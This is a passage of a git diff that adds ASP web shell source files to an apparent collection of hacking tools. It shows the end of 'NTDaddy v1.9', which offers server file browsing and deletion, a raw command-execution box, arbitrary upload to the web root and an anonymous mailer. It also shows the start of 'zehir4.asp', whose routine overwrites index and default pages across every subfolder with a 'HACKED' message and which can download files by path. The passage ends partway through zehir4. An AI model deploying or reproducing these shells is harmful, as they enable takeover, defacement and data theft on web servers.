+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Accessed</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Modified</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Name</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Path</u></b></td>")
+response.write("</tr>")
+end if
+For Each f1 in sf
+if showfolderinfo="TRUE" then
+response.write("<tr>")
+response.write("<td><input type=radio name=FolderName value=" & chr(34) & FP & f1.name & chr(34) & "><Input type=submit name=FolderPath value=" & chr(34) & FP & F1.name & "\" & chr(34) & "></td>")
+response.write("<td align=center nowrap>" & FormatNumber(f1.size/1024, 0)  & " kb</td>")
+response.write("<td align=center nowrap>" & f1.type & "</td>")
+folderattributes="...."
+select case f1.attributes
+case 0
+FolderAttributes = "Normal"
+case 1
+FolderAttributes = "Read Only"
+case 2
+FolderAttributes = "Hidden"
+case 3  'Extra
+FolderAttributes = "Read Only, Hidden"
+case 4
+FolderAttributes = "System"
+case 7  'Extra
+FolderAttributes = "Read Only, Hidden, System"
+case 8
+FolderAttributes = "Volume"
+case 16
+FolderAttributes = "Directory"
+case 17 'Extra
+FolderAttributes = "Read Only, Directory"
+case 18 'Extra
+FolderAttributes = "Hidden, Directory"
+case 19
+FolderAttributes = "Read Only, Hidden, Directoy"
+case 20 'Extra
+FolderAttributes = "System, Directory"
+case 22 'Extra
+FolderAttributes = "Hidden, System. Directory"
+case 23
+FolderAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FolderAttributes = "Archive"
+case 33 'Extra
+FolderAttributes = "Read Only, Archive"
+case 34 'Extra
+FolderAttributes = "Hidden, Archive"
+case 38 'Extra
+FolderAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FolderAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FolderAttributes = "Directory, Archive"
+case 64
+FolderAttributes = "Alias"
+case 128
+FolderAttributes = "Compressed"
+case else
+FolderAttributes = f1.attributes
+end select
+response.write("<td align=center nowrap>" & FolderAttributes & "</td>")
+if f1.datecreated = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datecreated & "</td>")
+end if
+if f1.datelastaccessed = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastaccessed & "</td>")
+end if
+if f1.datelastmodified = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastmodified & "</td>")
+end if
+response.write("<td align=center nowrap>" & f1.shortname & "</td>")
+response.write("<td align=center nowrap>" & f1.shortpath & "\</td></tr>")
+else
+response.write("<tr><td><input type=radio name=FolderName value=" & chr(34) & FP & f1.name & chr(34) & "><Input type=submit name=FolderPath value=" & chr(34) & FP & F1.name & "\" & chr(34) & "></td></tr>")
+end if
+Next
+response.write("</table>")
+response.write("</form>")
+End Function
+Function ShowFileNames()
+on error resume next
+Dim fs, f, f1, fc, FP
+dim ShowFileInfo,FileAttributes,ShowPrefix
+ShowPrefix=request.form("txtShowPrefix")
+ShowFileInfo=Request.form("chkShowFileInfo")
+FP=Request.Form("FolderPath")
+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+IP=chr(34) & IP & chr(34)
+end if
+CurrentPath=FP
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set f = fs.GetFolder(FP)
+Set fc = f.Files
+response.write("<form name=lstFiles action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=submit value=RefreshFiles> <input type=checkbox name=chkShowFileInfo value=TRUE> Show File Info &<br>Show Only:  <input type=text name=txtShowPrefix value= ></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=DeleteFile><input type=submit name=cmdOption Value=CopyFile> to <input type=text name=CopyFileTo></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=OpenTextFile><select name=optioMode><option value=" & chr(34) & "1" & chr(34) & ">For Reading <option value="& chr(34) & "2" & chr(34) & ">For Writing <option value=" & chr(34) & "8" & chr(34) & ">For Appending</select><select name=optformat><option value=" & chr(34) & "-2" & chr(34) & ">System Default <option value=" & chr(34) & "-1" & chr(34) & ">Unicode <option value=" & chr(34) & "0" & chr(34) & ">ASCII</select></td>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=SetFileAttributes>")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & fp & chr(34) & "></tr>")
+if showfileinfo="TRUE" then
+response.write("<TR>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>File</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Size</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Type</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Attributes</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Created</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Accessed</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Modified</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Name</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Path</u></b></td>")
+response.write("</tr>")
+end if
+For Each f1 in fc
+if showfileinfo="TRUE" then
+if lcase(right(f1.name,(len(ShowPrefix)))) = lcase(ShowPrefix) then
+response.write("<tr>")
+response.write("<td align=center nowrap><input type=radio name=FileName value=" & chr(34) & FP & f1.name & chr(34) & ">" & f1.name & "</td>")
+response.write("<td align=center nowrap>" & FormatNumber(f1.size/1024, 0)  & " kb</td>")
+response.write("<td align=center nowrap>" & f1.type & "</td>")
+select case f1.attributes
+case 0
+FileAttributes = "Normal"
+case 1
+FileAttributes = "Read Only"
+case 2
+FileAttributes = "Hidden"
+case 3  'Extra
+FileAttributes = "Read Only, Hidden"
+case 4
+FileAttributes = "System"
+case 7  'Extra
+FileAttributes = "Read Only, Hidden, System"
+case 8
+FileAttributes = "Volume"
+case 16
+FileAttributes = "Directory"
+case 19
+FileAttributes = "Read Only, Hidden, Directoy"
+case 23
+FileAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FileAttributes = "Archive"
+case 33 'Extra
+FileAttributes = "Read Only, Archive"
+case 34 'Extra
+FileAttributes = "Hidden, Archive"
+case 38 'Extra
+FileAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FileAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FileAttributes = "Directory, Archive"
+case 64
+FileAttributes = "Alias"
+case 128
+FileAttributes = "Compressed"
+case else
+FileAttributes = f1.attributes
+end select
+response.write("<td align=center nowrap>" & FileAttributes & "</td>")
+if f1.datecreated = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datecreated & "</td>")
+end if
+if f1.datelastaccessed = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastaccessed & "</td>")
+end if
+if f1.datelastmodified = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastmodified & "</td>")
+end if
+response.write("<td align=center nowrap>" & f1.shortname & "</td>")
+response.write("<td align=center nowrap>" & f1.shortpath & "</td></tr>")
+end if
+else
+if lcase(right(f1.name,(len(ShowPrefix)))) = lcase(ShowPrefix) then
+response.write("<tr><td><input type=radio name=FileName value=" & chr(34) & FP & f1.name & chr(34) & ">" & f1.name & "</td></tr>")
+end if
+end if
+Next
+response.write("</table>")
+response.write("</form>")
+End Function
+%>
+<STYLE>
+BODY
+{scrollbar-face-color: #f8f8ff; scrollbar-shadow-color: #cccccc;
+scrollbar-highlight-color: #cccccc; scrollbar-3dlight-color: #cccccc;
+scrollbar-darkshadow-color: #000000; scrollbar-track-color: #000000;
+scrollbar-arrow-color: #000000}
+</STYLE>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<center>
+<font size="18" color="#ffffff">NTDaddy | fux0r inc.</font>
+<hr color="#ffffff">
+<table border=1 width="100%" color="#fffff">
+<tr>
+<td align=center width=100% bgcolor=#ffffff><font color=#000000><a name=lblCurrentPath value=
+<% 
+FP=Request.Form("FolderPath")
+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+end if
+response.write(chr(34) & IP & chr(34) & ">" & FP)
+%>
+</a></td>
+</tr>
+</table>
+<table border=0 cellspacing=1 bordercolor="#ffffff" width=100% height=100%>
+<tr colspan=3><td align=left colspan=3><% =ShowDriveLetters() %></td>
+<td align=center></td></tr>
+<tr valign=top width=100%><td align=left><% =ShowFolderNames() %></td>
+<td align=right><% =ShowFileNames() %></td>
+</tr>
+</table>
+<br><hr color="#ffffff"><br>
+<table cellpadding="3" cellspacing="3" border="5" bordercolor="#ffffff">
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font color="#000000" size="4"><b>� Remote Info.</b></font>
+</td>
+<td align="left" bgcolor="#F8F8FF">
+<font color="#000000" size="4"><b>� Local Info.</b></font>
+</td>
+</tr>
+<tr>
+<td align=left>
+<div align=left><font size="3">
+<b>User</b>: <%= "\\" & oScriptNet.ComputerName & " \ " & oScriptNet.UserName %> <br>
+<b>ID</b>: <%=request.servervariables("SERVER_NAME")%> <br>
+<b>IP</b>: <%=request.servervariables("LOCAL_ADDR")%> <br>
+<b>HTTPD</b>: <%=request.servervariables("SERVER_SOFTWARE")%> <b>Port</b>: <%=request.servervariables("SERVER_PORT")%> <br>
+<b>Webroot</b>: <%=request.servervariables("APPL_PHYSICAL_PATH")%> <br>
+<b>LogRoot</b>: <%=request.servervariables("APPL_MD_PATH")%> <br>
+<b>Date</b>: <% =date() %> <br>
+<b>Time</b>: <%=time() %> <br>
+<b>HTTPs</b>: <%=request.servervariables("HTTPS")%>
+<br></font></div>
+</td>
+<td align="left" valign="top">
+<b>Local Addr (What they see.)</b>: <%=request.servervariables("REMOTE_ADDR")%> <br>
+<b>Forwarded from</b> : <%=request.servervariables("HTTP_X_FORWARDED_FOR")%> <br>
+<b>Via</b>: <%=request.servervariables("HTTP_VIA")%> <br>
+<b>User Agent</b>: <%=request.servervariables("HTTP_USER_AGENT")%> <br>
+<b>Wookie</b>: <%=request.servervariables("HTTP_WOOKIE")%> <br>
+<b>Cache Control</b>: <%=request.servervariables("HTTP_CACHE_CONTROL")%> <br>
+<b>Interface</b>: <%=request.servervariables("GATEWAY_INTERFACE")%> <br>
+<b>Protocol</b>: <%=request.servervariables("SERVER_PROTOCOL")%> <br>
+<b>Method</b>: <%=request.servervariables("REQUEST_METHOD")%>
+</td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<br>
+<table cellpadding="3" cellspacing"1" bordercolor="#F8F8FF" border=5>
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font size="2" color="#000000"><b>� File Upload Utility</b></font></td>
+</tr>
+<tr>
+<td align="left">
+<form method=post ENCTYPE="multipart/form-data">
+<b>File</b> : <input type="file" size="35" name="File1"><br>
+<input type="submit" Name="Action" value="Upload the file">
+</form></td>
+</tr>
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font size="2" color="#000000"><b>� RAW D.O.S. COMMAND INTERFACE</b></font></td>
+</tr>
+<tr valign="top">
+<td align="left">
+<form action="<%= Request.ServerVariables("URL") %>" method="POST">
+<p><input type="text" name=".CMD" size="45" value="<%= szCMD %>"> <input type="submit" value="Run"> </p>
+</form>
+<pre>
+<%
+If (IsObject(oFile)) Then
+On Error Resume Next
+Response.Write Server.HTMLEncode(oFile.ReadAll)
+oFile.Close
+Call oFileSys.DeleteFile(szTempFile, True)
+End If%>
+</pre>
+</td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<br>
+<form action=ntdaddy.asp method=post>
+<form action=ntdaddy.asp method=post>
+<table border=3 cellpadding="3" cellspacing="2" bordercolor="#ffffff" width="400">
+<tr>
+<td bgcolor="#F8F8FF" colspan="2"><font color="#000000" align="left"><b>� Anonymous Email Utility</b></font></td>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>From:</b></font> </td>
+<td><input name=From size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>To:</b></font> </td>
+<td><input name=To size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>Subject:</b></font> </td>
+<td><input name=Subject size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td valign="top" bgcolor="#F8F8FF"><font color="#000000"><b>Body:</b></font> </td>
+<td><textarea cols=30 name=Body rows=5 style="HEIGHT: 86px; WIDTH: 322px" wrap=virtual></textarea></td>
+</tr>
+<tr>
+<td align="right" bgcolor="#F8F8FF" colspan="2">
+<input type="submit" value="Send Mail">
+<input type="hidden" name="flag" value="1"></td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<font size="#ffffff"><center>�[ <b>NTDaddy v1.9</b> ][ by obzerve ][ for the brothers of <b>fux0r inc.</b> 2k+1 ]�</b></center></font>
+</body>
+</html>
+<SCRIPT RUNAT=SERVER LANGUAGE=VBSCRIPT>
+Const IncludeType = 2 
+Dim UploadSizeLimit
+Function GetUpload()
+Dim Result
+Set Result = Nothing
+If Request.ServerVariables("REQUEST_METHOD") = "POST" Then 
+Dim CT, PosB, Boundary, Length, PosE
+CT = Request.ServerVariables("HTTP_Content_Type") 
+If LCase(Left(CT, 19)) = "multipart/form-data" Then 
+PosB = InStr(LCase(CT), "boundary=") 
+If PosB > 0 Then Boundary = Mid(CT, PosB + 9) 
+PosB = InStr(LCase(CT), "boundary=") 
+If PosB > 0 then 
+PosB = InStr(Boundary, ",")
+If PosB > 0 Then Boundary = Left(Boundary, PosB - 1)
+end if
+Length = CLng(Request.ServerVariables("HTTP_Content_Length")) 
+If "" & UploadSizeLimit <> "" Then
+UploadSizeLimit = CLng(UploadSizeLimit)
+If Length > UploadSizeLimit Then
+Request.BinaryRead (Length)
+Err.Raise 2, "GetUpload", "Upload size " & FormatNumber(Length, 0) & "B exceeds limit of " & FormatNumber(UploadSizeLimit, 0) & "B"
+Exit Function
+End If
+End If
+If Length > 0 And Boundary <> "" Then 
+Boundary = "--" & Boundary
+Dim Head, Binary
+Binary = Request.BinaryRead(Length) 
+Set Result = SeparateFields(Binary, Boundary)
+Binary = Empty 
+Else
+Err.Raise 10, "GetUpload", "Zero length request ."
+End If
+Else
+Err.Raise 11, "GetUpload", "No file sent."
+End If
+Else
+Err.Raise 1, "GetUpload", "Bad request method."
+End If
+Set GetUpload = Result
+End Function
+Function SeparateFields(Binary, Boundary)
+Dim PosOpenBoundary, PosCloseBoundary, PosEndOfHeader, isLastBoundary
+Dim Fields
+Boundary = StringToBinary(Boundary)
+PosOpenBoundary = InStrB(Binary, Boundary)
+PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary, 0)
+Set Fields = CreateObject("Scripting.Dictionary")
+Do While (PosOpenBoundary > 0 And PosCloseBoundary > 0 And Not isLastBoundary)
+Dim HeaderContent, FieldContent, bFieldContent
+Dim Content_Disposition, FormFieldName, SourceFileName, Content_Type
+Dim Field, TwoCharsAfterEndBoundary
+PosEndOfHeader = InStrB(PosOpenBoundary + Len(Boundary), Binary, StringToBinary(vbCrLf + vbCrLf))
+HeaderContent = MidB(Binary, PosOpenBoundary + LenB(Boundary) + 2, PosEndOfHeader - PosOpenBoundary - LenB(Boundary) - 2)
+bFieldContent = MidB(Binary, (PosEndOfHeader + 4), PosCloseBoundary - (PosEndOfHeader + 4) - 2)
+GetHeadFields BinaryToString(HeaderContent), Content_Disposition, FormFieldName, SourceFileName, Content_Type
+Set Field = CreateUploadField() 
+Set FieldContent = CreateBinaryData()
+FieldContent.ByteArray = bFieldContent
+FieldContent.Length = LenB(bFieldContent)
+Field.Name = FormFieldName
+Field.ContentDisposition = Content_Disposition
+Field.FilePath = SourceFileName
+Field.FileName = GetFileName(SourceFileName)
+Field.ContentType = Content_Type
+Field.Length = FieldContent.Length
+Set Field.Value = FieldContent
+Fields.Add FormFieldName, Field
+TwoCharsAfterEndBoundary = BinaryToString(MidB(Binary, PosCloseBoundary + LenB(Boundary), 2))
+isLastBoundary = TwoCharsAfterEndBoundary = "--"
+If Not isLastBoundary Then 
+PosOpenBoundary = PosCloseBoundary
+PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary)
+End If
+Loop
+Set SeparateFields = Fields
+End Function
+Function GetHeadFields(ByVal Head, Content_Disposition, Name, FileName, Content_Type)
+Content_Disposition = LTrim(SeparateField(Head, "content-disposition:", ";"))
+Name = (SeparateField(Head, "name=", ";")) 
+If Left(Name, 1) = """" Then Name = Mid(Name, 2, Len(Name) - 2)
+FileName = (SeparateField(Head, "filename=", ";")) 
+If Left(FileName, 1) = """" Then FileName = Mid(FileName, 2, Len(FileName) - 2)
+Content_Type = LTrim(SeparateField(Head, "content-type:", ";"))
+End Function
+Function SeparateField(From, ByVal sStart, ByVal sEnd)
+Dim PosB, PosE, sFrom
+sFrom = LCase(From)
+PosB = InStr(sFrom, sStart)
+If PosB > 0 Then
+PosB = PosB + Len(sStart)
+PosE = InStr(PosB, sFrom, sEnd)
+If PosE = 0 Then PosE = InStr(PosB, sFrom, vbCrLf)
+If PosE = 0 Then PosE = Len(sFrom) + 1
+SeparateField = Mid(From, PosB, PosE - PosB)
+Else
+SeparateField = Empty
+End If
+End Function
+Function GetFileName(FullPath)
+Dim Pos, PosF
+PosF = 0
+For Pos = Len(FullPath) To 1 Step -1
+Select Case Mid(FullPath, Pos, 1)
+Case "/", "\": PosF = Pos + 1: Pos = 0
+End Select
+Next
+If PosF = 0 Then PosF = 1
+GetFileName = Mid(FullPath, PosF)
+End Function
+Function BinaryToString(Binary)
+dim cl1, cl2, cl3, pl1, pl2, pl3
+Dim L
+cl1 = 1
+cl2 = 1
+cl3 = 1
+L = LenB(Binary)
+Do While cl1<=L
+pl3 = pl3 & Chr(AscB(MidB(Binary,cl1,1)))
+cl1 = cl1 + 1
+cl3 = cl3 + 1
+if cl3>300 then
+pl2 = pl2 & pl3
+pl3 = ""
+cl3 = 1
+cl2 = cl2 + 1
+if cl2>200 then
+pl1 = pl1 & pl2
+pl2 = ""
+cl2 = 1
+End If
+End If
+Loop
+BinaryToString = pl1 & pl2 & pl3
+End Function
+Function BinaryToStringold(Binary)
+Dim I, S
+For I = 1 To LenB(Binary)
+S = S & Chr(AscB(MidB(Binary, I, 1)))
+Next
+BinaryToString = S
+End Function
+Function StringToBinary(String)
+Dim I, B
+For I=1 to len(String)
+B = B & ChrB(Asc(Mid(String,I,1)))
+Next
+StringToBinary = B
+End Function
+Function vbsSaveAs(FileName, ByteArray)
+Dim FS, TextStream
+Set FS = CreateObject("Scripting.FileSystemObject")
+Set TextStream = FS.CreateTextFile(FileName)
+TextStream.Write BinaryToString(ByteArray) 
+TextStream.Close
+End Function
+</SCRIPT>
+<SCRIPT RUNAT=SERVER LANGUAGE=JSCRIPT>
+function CreateUploadField(){ return new uf_Init() }
+function uf_Init(){
+this.Name = null
+this.ContentDisposition = null
+this.FileName = null
+this.FilePath = null
+this.ContentType = null
+this.Value = null
+this.Length = null
+}
+function CreateBinaryData(){ return new bin_Init() }
+function bin_Init(){
+this.ByteArray = null
+this.Length = null
+this.String = jsBinaryToString
+this.SaveAs = jsSaveAs
+}
+function jsBinaryToString(){
+return BinaryToString(this.ByteArray)
+}
+function jsSaveAs(FileName){
+return vbsSaveAs(FileName, this.ByteArray)
+}
+</SCRIPT>
+<%
+If Request.ServerVariables("REQUEST_METHOD") = "POST" Then 
+Set Fields = GetUpload()
+FilePath = Server.MapPath(".") & "\" & Fields("File1").FileName
+Fields("File1").Value.SaveAs FilePath
+End If
+%>
+<%
+Else
+Dim anonFrom,anonTo,anonSubj,anonBody
+anonFrom = request.form("From")
+anonTo = request.form("To")
+anonSubj = request.form("Subject")
+anonBody = request.form("Body")
+Set objMail = CreateObject("CDONTS.NewMail")
+objMail.From=anonFrom
+objMail.To=anonTo
+objMail.Subject=anonSubj
+objMail.Body=anonBody
+intReturn=objMail.Send()
+%>
+<html>
+<head><title>|[NTDaddy v1.9 | anon email]</title></head>
+<h1>Message sent successfully!</h1><br><br><br>
+<table border=0 cellpadding="0" cellspacing="3">
+<tr>
+<td>
+<input type='button' value='Back' onclick=history.back()> </td>
+<td>
+<h2>[NTDaddy v1.9 - obzerve | fux0r inc.]</h2> </td>
+</tr>
+</table>
+</html>
+<%
+End if
+%>
+
+
+
diff --git a/xakep-shells/ASP/zehir4.asp.txt b/xakep-shells/ASP/zehir4.asp.txt
new file mode 100644
index 0000000..1be2420
--- /dev/null
+++ b/xakep-shells/ASP/zehir4.asp.txt
@@ -0,0 +1,1190 @@
+<%
+mpat=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
+dosyaPath = mid(mpat,InStrRev(mpat,"\")+1)
+on error resume next
+Dim objFSO,popup
+Set objFSO = CreateObject ("Scripting.FileSystemObject")
+if Request("kuskapani")=1 then
+    Response.End
+end if
+
+
+if Request("kuskapani")=2 then
+    on error resume next
+    path = Request("path")
+    sFolder = Request("SubFolder")
+    fName = Request("FileName")
+    d1 = Request("dosya1")
+    d2 = Request("dosya2")
+    d3 = Request("dosya3")
+    d4 = Request("dosya4")
+    bg__ = Request.Form("selectColour")
+    if bg__ = "0" then bg__ = "#ffffff"
+    byMesaj = "<body bgColor='"&bg__&"'>" & Request("byMesaj") & "<br><br><center><font color=gray size=2>HACKED " & Session("n2") & "3 ;)</font>"
+
+    sFolder = Replace(sFolder,"/","\")
+
+    if Right(sFolder,1)<>"\" then sFolder = sFolder & "\"
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.SubFolders
+    h__ = 0
+    f__ = 0
+    ss__ = now
+    For Each f1 In fc
+        hedef_ = replace(f1.path,"/","\")
+        if Right(hedef_,1)<>"\" then hedef_ = hedef_ & "\"
+        hedef__ = left(hedef_,len(hedef_)-1)
+        folderName_ = Right(hedef__, len(hedef__)-instrrev(hedef__,"\"))
+            if d1<>"" then d1 = true
+            if d2<>"" then d2 = true
+            if d3<>"" then d3 = true
+            if d4<>"" then d4 = true
+            on error goto 0:on error resume next
+            if fName<>"" then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & fName, True)
+                MyFile.write byMesaj
+            end if
+            if d1 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.htm", True)
+                MyFile.write byMesaj
+            end if
+            if d2 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.htm", True)
+                MyFile.write byMesaj
+            end if
+            if d3 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.asp", True)
+                MyFile.write byMesaj
+            end if
+            if d4 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.asp", True)
+                MyFile.write byMesaj
+            end if
+
+            if err<>0 then
+                response.Write folderName_ & " <font color=red>[FAILED!]</font><br>"
+                f__ = f__ + 1
+            else
+                response.Write folderName_ & " <font color=blue>[HACKED]</font><br>"
+                h__ = h__ + 1
+            end if
+    Next
+    ss___ = now
+    response.Write "<br><font color=white>by zehir!...</font><br><b>Sonuc : </b> Toplam S�re : "&left(ss__-ss___,5)&"sn. ;)<br><font color=blue>Hacked</font> = "&h__&"<br><font color=red>Failed</font> = "&f__
+    response.End
+end if
+
+status = Request("status")
+path   = Request("path")
+dPath  = Request("dPath")
+arama  = Request("txArama")
+dkayit = Request("dkayit")
+table  = Request("table")
+del    = Request("del")
+islem  = Request("islem")
+strSQL = Request("strSQL")
+cf       = Request("cf")
+pathfile = request("pathfile")
+if path="" then path=request.servervariables("APPL_PHYSICAL_PATH")
+if status="" then status=2
+popup = true
+'////////////////////////////////
+Function ReadBinaryFile(FileName)
+  Const adTypeBinary = 1
+  Dim BinaryStream
+  Set BinaryStream = CreateObject("ADODB.Stream")
+  BinaryStream.Type = adTypeBinary
+  BinaryStream.Open
+  BinaryStream.LoadFromFile FileName
+  ReadBinaryFile = BinaryStream.Read
+End Function
+if status="-3" then
+    Response.Buffer=True
+    Set Fil = objFSO.GetFile(pathfile)
+
+    Response.contenttype="application/force-download"
+    Response.AddHeader "Cache-control","private"
+    Response.AddHeader "Content-Length", Fil.Size
+    Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name
+
+    Response.BinaryWrite readBinaryFile(Fil.path)
+    Set f = Nothing: Set Fil = Nothing
+    response.End()
+end if
+'//////////////////////////////////
+if status="-4" then popup=false
+if status="13" then popup=false
+if status="14" then popup=false
+if status="15" then popup=false
+if status="16" then popup=false
+if status="17" then popup=false
+if status="18" then popup=false
+if status="19" then popup=false
+if status="33" then popup=false
+if status="40" then popup=false
+if status="50" then popup=false
+byMsg = request.QueryString("byMsg")
+if byMsg<>"" then response.Write byMsg
+response.Write "<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&gt;</title>"
+if popup then
+%>
+<center>
+<a href="<%=dosyaPath%>?mevla=1&status=13" onclick="sistemBilgisi(this.href);return false;">System Info</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=40" onclick="sistemTest(this.href);return false;">System Test</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=50&path=<%=path%>" onclick="SitelerTestte(this.href);return false;">Sites Test</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=14&path=<%=path%>" onclick="klasorIslemleri(this.href);return false;">Folder Action</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=15" onclick="sqlServer(this.href);return false;">SQL Server</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=33" onclick="poweredby(this.href);return false;">POWERED BY</a>
+<script language=javascript>
+    function sistemBilgisi(yol){
+        NewWindow(yol,"",600,240,"no");
+    }
+    function SitelerTestte(yol){
+        NewWindow(yol,"",530,420,"no");
+    }
+    function klasorIslemleri(yol){
+        NewWindow(yol,"",400,280,"no");
+    }
+    function sqlServer(yol){
+        NewWindow(yol,"",300,50,"no");
+    }
+    function poweredby(yol){
+        NewWindow(yol,"",300,50,"no");
+    }
+    function sistemTest(yol){
+        NewWindow(yol,"",400,300,"no");
+    }
+</script>
+<%
+end if
+'####################################
+Class clsUpload
+    Private mbinData
+    Private mlngChunkIndex
+    Private mlngBytesReceived
+    Private mstrDelimiter
+    Private CR
+    Private LF
+    Private CRLF
+    Private mobjFieldAry()
+    Private mlngCount
+
+    Private Sub RequestData
+        Dim llngLength
+        mlngBytesReceived = Request.TotalBytes
+        mbinData = Request.BinaryRead(mlngBytesReceived)
+    End Sub
+
+    Private Sub ParseDelimiter()
+        mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
+    End Sub
+
+    Private Sub ParseData()
+        Dim llngStart
+        Dim llngLength
+        Dim llngEnd
+        Dim lbinChunk
+        llngStart = 1
+        llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
+        While Not llngStart = 0
+            llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
+            llngLength = llngEnd - llngStart
+            lbinChunk = MidB(mbinData, llngStart, llngLength)
+            Call ParseChunk(lbinChunk)
+            llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
+        Wend
+    End Sub
+
+    Private Sub ParseChunk(ByRef pbinChunk)
+        Dim lstrName
+        Dim lstrFileName
+        Dim lstrContentType
+        Dim lbinData
+        Dim lstrDisposition
+        Dim lstrValue
+        lstrDisposition = ParseDisposition(pbinChunk)
+        lstrName = ParseName(lstrDisposition)
+        lstrFileName = ParseFileName(lstrDisposition)
+        lstrContentType = ParseContentType(pbinChunk)
+        If lstrContentType = "" Then
+            lstrValue = CStrU(ParseBinaryData(pbinChunk))
+        Else
+            lbinData = ParseBinaryData(pbinChunk)
+        End If
+        Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
+    End Sub
+
+    Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
+        Dim lobjField
+        ReDim Preserve mobjFieldAry(mlngCount)
+        Set lobjField = New clsField
+        lobjField.Name = pstrName
+        lobjField.FilePath = pstrFileName
+        lobjField.ContentType = pstrContentType
+        If LenB(pbinData) = 0 Then
+            lobjField.BinaryData = ChrB(0)
+            lobjField.Value = pstrValue
+            lobjField.Length = Len(pstrValue)
+        Else
+            lobjField.BinaryData = pbinData
+            lobjField.Length = LenB(pbinData)
+            lobjField.Value = ""
+        End If
+        Set mobjFieldAry(mlngCount) = lobjField
+        mlngCount = mlngCount + 1
+    End Sub
+
+    Private Function ParseBinaryData(ByRef pbinChunk)
+        Dim llngStart
